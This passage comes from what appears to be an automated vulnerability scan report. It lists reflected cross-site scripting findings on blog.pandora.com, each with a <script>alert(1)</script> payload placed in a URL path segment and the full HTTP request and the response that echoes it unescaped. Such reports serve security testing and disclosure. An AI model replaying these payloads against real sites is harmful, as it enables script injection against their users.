Date: Sun, 09 Jan 2011 02:05:11 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 346
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraf0dd2<script>alert(1)</script>e2bfea7bc51/archives/ohio/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 79fc4<script>alert(1)</script>3aa6b3a6382 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives79fc4<script>alert(1)</script>3aa6b3a6382/ohio/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:14 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 346
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives79fc4<script>alert(1)</script>3aa6b3a6382/ohio/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 16703<script>alert(1)</script>25633d7f8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/ohio16703<script>alert(1)</script>25633d7f8/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:16 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 344
Connection: close
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/ohio16703<script>alert(1)</script>25633d7f8/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a724b<script>alert(1)</script>15c03653159 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraa724b<script>alert(1)</script>15c03653159/archives/oregon/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:14 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 348
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraa724b<script>alert(1)</script>15c03653159/archives/oregon/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 39f53<script>alert(1)</script>f58171d63c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives39f53<script>alert(1)</script>f58171d63c4/oregon/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:16 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 348
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives39f53<script>alert(1)</script>f58171d63c4/oregon/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 88507<script>alert(1)</script>bba21d90949 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/oregon88507<script>alert(1)</script>bba21d90949/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:18 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 348
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/oregon88507<script>alert(1)</script>bba21d90949/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e4fb4<script>alert(1)</script>426d5c520e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorae4fb4<script>alert(1)</script>426d5c520e/archives/other-states/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:14 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 353
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorae4fb4<script>alert(1)</script>426d5c520e/archives/other-states/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8f143<script>alert(1)</script>15a8d762de1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives8f143<script>alert(1)</script>15a8d762de1/other-states/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:16 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives8f143<script>alert(1)</script>15a8d762de1/other-states/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 27558<script>alert(1)</script>268c97fcc9d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/other-states27558<script>alert(1)</script>268c97fcc9d/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:19 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/other-states27558<script>alert(1)</script>268c97fcc9d/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4116e<script>alert(1)</script>e1dd3c30265 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora4116e<script>alert(1)</script>e1dd3c30265/archives/other_states/index.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:40 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 364
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora4116e<script>alert(1)</script>e1dd3c30265/archives/other_states/index.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bbc81<script>alert(1)</script>8bbad4a334b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesbbc81<script>alert(1)</script>8bbad4a334b/other_states/index.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:42 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 364
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesbbc81<script>alert(1)</script>8bbad4a334b/other_states/index.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e3b20<script>alert(1)</script>a06d1810695 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/other_statese3b20<script>alert(1)</script>a06d1810695/index.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:44 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 364
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/other_statese3b20<script>alert(1)</script>a06d1810695/index.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a28a3<script>alert(1)</script>a45d2616222 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/other_states/index.htmla28a3<script>alert(1)</script>a45d2616222 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:47 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 364
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/other_states/index.htmla28a3<script>alert(1)</script>a45d2616222 was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2e30d<script>alert(1)</script>9faee399280 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora2e30d<script>alert(1)</script>9faee399280/archives/pennsylvania/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:14 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora2e30d<script>alert(1)</script>9faee399280/archives/pennsylvania/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 37daf<script>alert(1)</script>c2d02fb7876 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives37daf<script>alert(1)</script>c2d02fb7876/pennsylvania/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:16 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives37daf<script>alert(1)</script>c2d02fb7876/pennsylvania/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 60d1f<script>alert(1)</script>2be1e057475 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/pennsylvania60d1f<script>alert(1)</script>2be1e057475/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:19 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 354
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/pennsylvania60d1f<script>alert(1)</script>2be1e057475/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9a40f<script>alert(1)</script>859bfd370e9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora9a40f<script>alert(1)</script>859bfd370e9/archives/play-listen-repeat/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:16 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 360
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora9a40f<script>alert(1)</script>859bfd370e9/archives/play-listen-repeat/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 604e5<script>alert(1)</script>75e75ebb353 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives604e5<script>alert(1)</script>75e75ebb353/play-listen-repeat/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:18 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 360

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives604e5<script>alert(1)</script>75e75ebb353/play-listen-repeat/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d2f58<script>alert(1)</script>9cecf728f10 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/play-listen-repeatd2f58<script>alert(1)</script>9cecf728f10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:20 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 360

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/play-listen-repeatd2f58<script>alert(1)</script>9cecf728f10/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 410e8<script>alert(1)</script>b6acfa54d50 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora410e8<script>alert(1)</script>b6acfa54d50/archives/rhode-island/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:16 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora410e8<script>alert(1)</script>b6acfa54d50/archives/rhode-island/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c7510<script>alert(1)</script>e386b3405c7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
